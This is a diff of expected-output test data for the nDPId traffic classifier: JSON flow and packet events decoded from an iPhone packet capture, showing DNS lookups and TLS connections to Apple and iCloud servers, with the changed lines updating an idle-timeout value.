-00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8BIgAAP8RMcbAqAIRwKgCAc3KADUAKGCiwekBAAABAAAAAAAAA3d3dwZpY2xvdWQDY29tAAABAAE="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -158,10 +158,10 @@ 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD04UAAP8RYsHAqAIRwKgCAcLYADUAL8OecEkBAAABAAAAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454598755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1582454598755,"pkt":"xGGLNYKpxiwDYGpkCABFAAC9YWUAAEARk2jAqAIBwKgCEQA1zcoAqUkOwemBgAABAAQAAAAAA3d3dwZpY2xvdWQDY29tAAABAAHADAAFAAEAAAfiAB8Hd3d3LWNkbgZpY2xvdWQDY29tBmFrYWRucwNuZXQAwCwABQABAAAAjwAZA3d3dwZpY2xvdWQDY29tB2VkZ2VrZXnARsBXAAUAAQAAEZYAFQVlNDQ3OAFhCmFrYW1haWVkZ2XARsB8AAEAAQAAABgABBctSi4="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAADSfP0AAEARd7vAqAIBwKgCEQA10EUAvrFqiY6BgAABAAQAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAcAMAAUAAQAACaQAJwlpcGhvbmUtbGQMb3JpZ2luLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAxAAUAAQAAAMcAIQxpcGhvbmUtbGQtYXIFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAFQVlOTMzOAFkCmFrYW1haWVkZ2XAU8CRAAEAAQAAAA8ABFx6\/FI="} @@ -172,36 +172,36 @@ 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPdQkAAEARf7LAqAIBwKgCEQA10t8AuwWPZlqBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 